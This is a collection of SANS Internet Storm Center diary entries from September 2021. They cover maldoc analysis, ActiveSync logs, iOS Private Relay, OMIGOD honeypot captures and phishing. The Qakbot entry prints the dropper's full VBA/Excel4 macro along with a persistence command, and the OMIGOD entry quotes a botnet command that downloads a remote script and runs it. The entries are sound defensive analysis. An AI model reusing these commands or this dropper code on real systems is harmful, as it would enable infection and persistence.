ISC Stormcast For Tuesday, September 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7690, (Tue, Sep 28th)
ISC Stormcast For Monday, September 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7688, (Mon, Sep 27th)
If you are intested in CyberChef, I have more CyberChefs videos here.
Malware analysis is difficult.
But there is one method that everybody can follow, even without command-line skills: strings analysis.
Of course, there are many ways to make strings analysis impossible, by making the plaintext strings unreadable. Simple file compression is an example.
Xavier's diary entry "Excel Recipe: Some VBA Code with a Touch of Excel4 Macro" malicious document uses a sophisticated method: it combines VBA and Excel 4 macros to download Qakbot. Despite this complexity, strings analysis can be performed on this maldoc to find the URLs.
For this diary entry, I will analyze this maldoc with CyberChef:
First step: I add the maldoc as input:
Second step: I search for the strings operation:
Third step: I add the strings operation to the recipe:
If I browse through the output, I will find the URLs. But I want to automate that too.
Fourth step: I search for the regex operation:
Last step: I add the regex operation to the recipe, and configure it to use the buildtin URL regex and output matches only:
Now, these URLs are actually incomplete. The maldoc's script will add a path to these URLs that is a timestamp terminated with ".dat".
But despite that, the IPv4 addresses we found here, are good IOCs to get started.
Today, smartphones are everywhere and became our best friends for many tasks. Probably your users already access their corporate mailbox via a mobile device. If it's not yet the case, you probably have many requests to implement this. They are two ways to achieve this: you provide corporate devices to all users. From a risk perspective, it's the best solution: you select the models and control them. But it's very expensive and people don't like to carry two devices (a personal and a corporate one). Hopefully, if you use a Microsoft Exchange platform, there are ways to authorize personal devices to access corporate emails with a software component called ActiveSync. ActiveSync allows deploying basic security policies like forcing the device to be locked with a password, force a minimum password length, etc. However, it's not a real MDM ("Mobile Device Management").
But you've hundreds or thousands of users connecting their mobile devices to your Exchange server how to keep an inventory of models, hardware, etc. Especially if the system administrators are not ready to share some information with your security team? ActiveSync is based on open protocols: HTTP(S) and XML. To synchronize, the ActiveSync server must be facing the Internet like any web server. So it mean we can gather some logs? Via a reverse-proxy or directly on the IIS server running the ActiveSync service?
Because network data is a goldmine (you can learn this topic in FOR572 - "Advanced Network Forensics: Threat Hunting, Analysis, and Incident Response"), let's have a look at the IIS logs, located in C:\inetpub\logs\LogFiles\W3SVC1\*.log. Here is a sample HTTP request: (the line is pretty long and has been beautified)2021-09-20 12:10:46 192.168.4.101 POST /Microsoft-Server-ActiveSync/default.eas \ Cmd=Ping&User=domain.test%5Cuser01&DeviceId=XXXXXXXX&DeviceType=SamsungDevice& \ CorrelationID=<empty>;&ClientId=XXXXXXXXX&cafeReqId=817b3ec9-6360-4526-a738-xxxxxxxxxxxx; \ 443 domain.test\user01 10.0.0.11 Android-SAMSUNG-SM-G950F/101.9 - 200 0 0 609
One of the interesting fields is the User-Agent (like any HTTP request) but the ActiveSync client submits the device model, OS & version through this field! Here are some User-Agent strings:Android-LG-G810/9.10.11 Android-SAMSUNG-SM-A505FN/101.10 Apple-iPad5C3/1807.82 Apple-iPhone10C4/1807.69 Apple-iPhone13C4/1807.82
Wait, did you read carefully the last sample? Does it mean that some users are already happy owners of a brand new iPhone 13? Unfortunately, it's not so easy! The ActiveSync user-agent does not reflect the model in "clear". It contains a reference to a model and you must convert it to the right device name. Example with "Apple-iPhone10C4/1807.82":
"iPhone 10C4" = "iPhone 8"
"1807.69" = "iOS 14.7"
How do we find the corresponding values? There are plenty of lists available online like this one for iOS
Now, you have all the requirements to build an inventory of all the mobile devices connecting to your ActiveSync instance and learn about:
- Outdated devices
- Suspicious devices (based on models not sold in Europe or your region)
- People using multiple devices (because we also have the username in the HTTP event log)
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, September 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7686, (Fri, Sep 24th)
ISC Stormcast For Thursday, September 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7684, (Thu, Sep 23rd)
Microsoft Excel supports two types of macros. The legacy format is known as “Excel4 macro” and the new (but already used for a while) is based on VBA. We already cover both formats in many diaries. Yesterday, I spotted an interesting sample that implements… both!
The malicious file was delivered through a classic phishing email and is called “Document_195004540-Copy.xls” (SHA256:4f4e67dccb3dfc213fac91d34d53d83be9b9f97c0b75fbbce8a6d24f26549e14). The file is unknown on VT at this time. It looks like a classic trap:
The document contains some VBA code:remnux@remnux:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls 1: 103 '\x01CompObj' 2: 240 '\x05DocumentSummaryInformation' 3: 208 '\x05SummaryInformation' 4: 180804 'Workbook' 5: 597 '_VBA_PROJECT_CUR/PROJECT' 6: 116 '_VBA_PROJECT_CUR/PROJECTwm' 7: 97 '_VBA_PROJECT_CUR/UserForm1/\x01CompObj' 8: 301 '_VBA_PROJECT_CUR/UserForm1/\x03VBFrame' 9: 226 '_VBA_PROJECT_CUR/UserForm1/f' 10: 272 '_VBA_PROJECT_CUR/UserForm1/o' 11: M 3768 '_VBA_PROJECT_CUR/VBA/Module1' 12: m 991 '_VBA_PROJECT_CUR/VBA/Sheet1' 13: M 3010 '_VBA_PROJECT_CUR/VBA/ThisWorkbook' 14: m 1195 '_VBA_PROJECT_CUR/VBA/UserForm1' 15: 3860 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT' 16: 2004 '_VBA_PROJECT_CUR/VBA/__SRP_0' 17: 138 '_VBA_PROJECT_CUR/VBA/__SRP_1' 18: 212 '_VBA_PROJECT_CUR/VBA/__SRP_2' 19: 206 '_VBA_PROJECT_CUR/VBA/__SRP_3' 20: 864 '_VBA_PROJECT_CUR/VBA/dir'
Here is the interesting macro (stream 11):remnux@remnux:/MalwareZoo/20210922$ oledump.py Document_195004540-Copy.xls -s 11 -v Attribute VB_Name = "Module1" Sub auto_open() On Error Resume Next Application.ScreenUpdating = False Set Fera = Excel4IntlMacroSheets Fera.Add.Name = "Sheet3" Sheets("Sheet3").Visible = False Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption Sheets("Sheet3").Range("K17") = "=NOW()" Sheets("Sheet3").Range("K18") = ".dat" Sheets("Sheet3").Range("H35") = "=HALT()" Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption Sheets("Sheet3").Range("I10") = UserForm1.Caption Sheets("Sheet3").Range("I11") = "JJCCBB" Sheets("Sheet3").Range("I12") = "Byukilos" Sheets("Sheet3").Range("G10") = "..\Xertis.dll" Sheets("Sheet3").Range("G11") = "..\Xertis1.dll" Sheets("Sheet3").Range("G12") = "..\Xertis2.dll" Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll" Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll" Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll" Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)" Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)" Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)" Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)" Sheets("Sheet3").Range("H17") = "=EXEC(I17)" Sheets("Sheet3").Range("H18") = "=EXEC(I18)" Sheets("Sheet3").Range("H19") = "=EXEC(I19)" Application.Run Sheets("Sheet3").Range("H1") End Sub Sub auto_close() On Error Resume Next Application.ScreenUpdating = True Application.DisplayAlerts = False Sheets("Sheet3").Delete Application.DisplayAlerts = True End Sub
First, the attacker wrote some “good” code because a new sheet ("Sheet3") is created and, when the document is closed, the sheet is removed! (Via the auto_close() function).
The magic line is this one:Set Fera = Excel4IntlMacroSheets
See the Microsoft documentation. An Excel4 macro is injected into the created sheet and executed. What does it do?
It downloads the second stage payload from three different URLs (stored in a form):hxxp://45[.]153[.]242[.]159/44461.9891568287.dat hxxp://188[.]165[.]62[.]61/44461.9891568287.dat hxxp://185[.]198[.]57[.]109/44461.9891568287.dat
The downloaded file is called Xertis.dll (SHA256:b8b8895cdf37dba76f9966ec100ac85cc0f70dfd79f09a175454b5062d21c25d) and again unknown on VT. This is a DLL that is loaded into the system via this command:regsvr32 -silent ..\Xertis.dll
Persistence is implemented via a scheduled task:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn wxhfetombc /tr "regsvr32.exe -s \"C:\Users\user01\Xertis.dll\"" /SC ONCE /Z /ST 23:45 /ET 23:57
Once I infected my lab, the following C2 traffic was generated:
It’s a Qakbot sample...
The VBA macro was not obfuscated but the idea of mixing VBA with Excel4 was pretty clever to defeat many hunting rules.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
A Twitter follower sent me a link to an interesting maldoc on Malware Bazaar (thanks).
It's a Word document (OOXML) that exploits vulnerability %%CVE:2021-40444%%.
If you follow the steps of my diary entry "Simple Analysis Of A CVE-2021-40444 .docx Document" you will not find an unusual URL. I'll explain why in this diary entry.
This is the content of the maldoc (using my tool zipdump.py):
Let's look into the documents.xml.rels file:
Here you see many numeric character references in this XML file, like m. This particular numeric character reference represents the letter m (ASCII 109).
We can use my tool numbers-to-string.py to convert these numbers to their corresponding character, like this:
And then we see the URL.
My xmldump.py tool converts these numeric charcter references too, that is another method to deobfuscate:
Now, let's come back to the output of zipdump:
Remark that the timestamps vary: some of them are 1980-01-01 00:00:00, and other are 2021-09-16.
When Office applications create an OOXML file, they do not encode the current time into the ZIP container's records, they use 1980-01-01 00:00:00. While ZIP tools will use the current time.
So this maldoc has most likely been created with Word, and has then been edited with another tool. This might well be one of the maldoc generator tools that have been released for CVE-2021-40444.
ISC Stormcast For Wednesday, September 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7682, (Wed, Sep 22nd)
One of the notable additions to iOS 15, which was officially released yesterday, is its "Private Relay" feature . Unlike a "simple" VPN, the private relay does appear to be more of a proxy service for HTTP, and it uses two hops with distinct entities to not allow one entity to become the new single-point-of-privacy-failure.
An "Apple+" subscription is required to use a private relay. All connections are authenticated with Apple. Apple states that it has some anti-abuse features in place but only mentions rate-limiting as one specific feature. Unlike most VPN services, Apple publishes a list of their egress IP addresses, including the geolocation assigned to them . It does not appear to be possible to alter your geolocation using Private Relay. One setting allows for a "more relaxed" location matching. Many people sign up for VPN services to watch content designated for a particular location. Apple's private relay does not appear to support this use case.
So, in short, Apple focuses on privacy with its Private Relay. The Private Relay appears to be limited to HTTP(s) traffic. Application not using HTTP(s) do not appear to use Private Relay. I used as a test the "Speedtest" application from Ookla, and it still displayed my actual ISP.
Each Private Relay egress point uses an IPv4 and IPv6 IP address. Even if your network is IPv4 only, you will be able to connect to IPv6 resources. This confused me at first, as my home network does not use IPv6 right now, and I still appeared to use an IPv6 address. My first guess was that some traffic still used the IPv6 address provided by the cell phone interface. But I ruled that out by disabling the cell phone interface. If the LTE/5G is used, the IPv6 address used is Apple's and not the ISPs. So both IPv4 and IPv6 addresses are anonymized.
After enabling Private Relay (Settings->iCloud->Private Relay), you will see the following DNS requests/responses for mask.icloud.com (A records and a HTTPS RR [Type 56]). The IP address I got for mask.icloud.com was in the 184.108.40.206/17 network, a network owned by Apple, but not its usual 17/8 network.
The connection to the relay uses QUIC to port 443/UDP and TLS 1.3. The client hello includes the server name extension and the server name "mask.icloud.com." Only 3 cipher suites are offered (TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256). The server ends up selecting the AES128 suite. Application Layer Protocol Negotiation (ALPN) is also used, with unsurprisingly HTTP/3 being the only option.
The HTTPS RR is interesting. It is not yet finalized as an RFC as far as I know . But I have seen it pop up occasionally. For the case of mask.icloud.com, I did not get a response for the HTTPS RR. Maybe it will show up in the future. But the idea is that part of the ALPN negotiation will happen via DNS. HTTPS RR is a performance feature, but it can also be used for encrypted client hellos (ECH), which is supposed to replace respective TXT records that have been used in the past to encrypt the server name option.
So in short:
- Does "Private Relay" replace VPNs: No. Private Relay appears only to encrypt/anonymize HTTP(S) traffic. Some Apps may still reveal your actual IP address. But as far as Safari goes, it works like a VPN. You are also not able to appear in a different location.
- Can you block the use of "Private Relay" in a corporate network: Yes. Overwrite/block DNS requests for mask.icloud.com and mask-h2.icloud.com (I didn't see the second hostname, but "Private Relay" may use it per Apple's documentation)
- Can I block people from using "Private Relay" to accessing my site: Yes. You would need to block Apple's long list of egress points. But there appears to be little point in blocking them.
- Are websites still able to track me? Yes and no. Websites usually do not rely on the IP address to track you but on cookies and other browser features. Private Relay only hides your IP address. It solves the "last mile" privacy issue of ISPs tracking your behavior.
Private Relay does offer some additional privacy protections. It is a bit less than a "real" VPN, but close to it and easier to use. (plus free if you already have iCloud+).
ISC Stormcast For Tuesday, September 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7680, (Tue, Sep 21st)
#OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports., (Mon, Sep 20th)
After the "OMIGOD" vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started pretty much immediately to scan for vulnerable hosts. We saw a quick rise of scans, particularly against %%port:1270%%. 
Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see "genuine" exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.
One exploit that just hit our honeypot (formatted for easier readability)
At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some "Mirai" style payloads being deployed.
Here are the most common commands we see executed (sometimes, the command is Base64 encoded):
wget -O lolol.sh http://220.127.116.11/lolol.sh; curl -o lolol.sh http://18.104.22.168/lolol.sh; chmod 777 lolol.sh; sh lolol.sh
This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.
I have seen the same command against the other ports associated with "OMI," using different 'test' URLs. The URL is not reachable. Note how the IP is the same as above.
In addition, I have seen some simple requests using "id" or "whoami," typical checks if the vulnerability is exploitable.
Interestingly, I have seen only one IP in our honeypots for the 'wget' or 'curl' commands, but the requests originated from 125 different source IPs just today alone. This appears to be one botnet, and I guess that right now, they are just looking for vulnerable systems (hitting the above URL would prove you to be vulnerable).
As far as scans against related ports (%%port:1270%%, %%port:5986%%, %%port:5987%%), below is a graph of the targets seeing scans on these ports:
It is interesting how the scans slowly increased in September before the vulnerability was announced, and something that needs a bit more time to look into.
Almost exactly half of the scans to these ports come from researchers. The "Strechoid" network appears to be most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these are typically publishing results, but for those that do expect a lot of identical papers/news releases soon with headlines like "1000's of exposed hosts found vulnerable to OMIGOD" (if they didn't find much) or "10s of 1000s of exposed hosts found vulnerable to OMIGOD" (if they found more).
So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.
ISC Stormcast For Monday, September 20th, 2021 https://isc.sans.edu/podcastdetail.html?id=7678, (Mon, Sep 20th)
I created a video for the analysis I described in my last diary entry "Simple Analysis Of A CVE-2021-40444 .docx Document".
I also cover another sample in that video, that is a bit harder to analyze (and has much lower detection rates on VT).
Remark that I always make sure that you can find the samples I analyze on Malware Bazaar too.
And here is the InQuest blog post I mention in the video: "Microsoft MSHTML Remote Code Execution Vulnerability".
Analyzing a malicious Word document like prod.docx that exploits %%cve:2021-40444%% is not difficult.
We need to find the malicious URL in this document. As I've shown before, this is quite simple: extract all XML files from the ZIP container (.docx files are OOXML files, that's a ZIP container with (mostly) XML files) and use a regular expression to search for URLs.
OOXML files contain a lot of legitimate URLs. Like schemas.microsoft.com. These can be filtered out with my tool re-search.py:
Did this threat really disappear? This isn’t a brand new technique to deliver malicious content to mobile devices but it seems that attackers started new waves of spam campaigns based on malicious calendar subscriptions. Being a dad, you can imagine that I always performed security awareness with my daughters. Since they use computers and the Internet, my message was always the same: “Don’t be afraid to ask me, there are no stupid questions or shame if you think you did something wrong”.
A few days ago, my youngest one came to me and told me she had the impression that her iPhone was hacked. After a quick check and reassuring her, I switched my dad's cap to the handler one and had a deeper look.
She told me that a pop-up was displayed on the screen and clicked on “Ok” too quickly. It was an unwanted calendar invitation and she subscribed to a spam feed. Her calendar became quickly flooded with events:
They are in French but easy to understand. They pretend to notify you about viruses found on the device and, using reminders, they keep the pressure on the victim:
If you visit the proposed link, you'll get more annoying ads pages, etc. This time hopefully, nothing very malicious but, seeing the latest iOS vulnerabilities, this technique could be used to deliver exploits. To get rid of all those messages, you just need to unsubscribe from the calendar.
In conclusion, already read carefully all popups displayed on your mobile phones (obviously on any type of device!).
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, September 17th, 2021 https://isc.sans.edu/podcastdetail.html?id=7676, (Fri, Sep 17th)
Phishing 101: why depend on one suspicious message subject when you can use many?, (Thu, Sep 16th)
There are many e-mail subjects that people tend to associate with phishing due to their overuse in this area. Among the more traditional and common phishing subjects, that most people have probably seen at some point, are variations on the “Your account was hacked”, “Your mailbox is full”, “You have a postal package waiting”, “Here are urgent payment instructions” and “Important COVID-19 information” themes.
Since security awareness courses often explicitly cover these, and e-mail messages with similar subjects are therefore usually classified by users as prima facie phishing attempts, one would reasonably expect that when a threat actor decides to use any such subject line, they would at least try to make the body of the e-mail a little more believable… However, as it turns out, this is not always the case.
We’ve recently received a phishing on our Handler e-mail address, which I found interesting, since its authors obviously decided to go the “all in” route when came to the use of multiple obviously suspicious message subjects, rather than try to make their creation more believable.
“But how could a single phishing e-mail have multiple subjects”, I hear you ask, dear reader.
Well, in this case, the phishing was a variation on the “You have undelivered e-mail messages waiting” theme, but instead of a list of urgent looking, yet believable subject lines, it contained pretty much the whole aforementioned set of suspicious-at-first-glance subjects, as you may see for yourself in the following image…
Apart from this rather interesting (and slightly funny) approach on the side of its authors, the e-mail was rather a low-quality example of a phishing, its less than professional origins showing – among other places – in the fact that multiple links pointed to URLs that were obviously intended for previous recipients/recipients from other domains.
The only link that did lead to a phishing page pointed to an HTML document hosted on the Google Firebase Storage that, when accessed, displayed a dynamically generated login prompt and tried to load a web page hosted on the domain to which the e-mail address belonged to in an iframe bellow this prompt in an attempt to make the login request look more believable (a technique that is fairly common, which provides another good reason why it’s advisable to use CSP/X-Frame-Options headers on ones webservers).